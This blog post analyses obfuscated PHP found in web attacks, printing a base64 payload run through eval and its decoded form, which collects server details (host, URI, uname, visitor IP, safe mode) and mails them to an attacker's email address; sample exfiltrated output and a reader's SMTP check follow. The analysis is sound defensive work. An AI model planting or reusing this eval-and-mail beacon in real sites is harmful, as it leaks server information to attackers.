Information, OpenSourceSoftware, Security

Obfuscating php code with base64

I keep seeing obfuscated php code in web application attacks, but its rather simple…

$lmge =
"JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZ
GUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9I
T1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52K
CJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9I
CRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXB
hc3M6ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iL
iRzYWZlei4iPHRvb2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNn
LCAkZnJvbSk7"; eval(base64_decode($lmge));

So, when you base64_decode it (just switch eval with echo), you get:

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "nBASE: $basenuname a: $namenBypass: $bypassernIP: $ipnHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

Again, hiding the email address in base64:
$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
Which spells out fr33sh3ll@gmail.com

There is also an “error” in the script, $bypasser is never set, but used in $msg.

Output sent to the fr33sh3ll account looks like this:

From: ___=OFF_HEHE<tool@gamelinux.org>
Subject: gamelinux.org
Data:
BASE: http://gamelinux.org/vurnable.php
uname a: Linux gamelinux 2.6.30 #1 SMP Wed Apr 1 23:47:10 UTC 2009 x86_64
Bypass:
IP: 10.10.3.254
Host: cracker.crackers.ru

From googling, it seems that the email account is old, and gmail has probably shut it down… so the bot that fires this around is probably old…

Advertisements
Standard

One thought on “Obfuscating php code with base64

  1. david says:

    Hi, the email account is still up:

    MX record about gmail.com exists.
    Connection succeeded to alt2.gmail-smtp-in.l.google.com SMTP.
    220 mx.google.com ESMTP s10si18842212muh.17
    > HELO verify-email.org
    250 mx.google.com at your service
    > MAIL FROM:
    =250 2.1.0 OK s10si18842212muh.17
    > RCPT TO:
    =550 5.2.1 The email account that you tried to reach is disabled. s10si18842212muh.17

    I have the same “ping” from my logs too.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s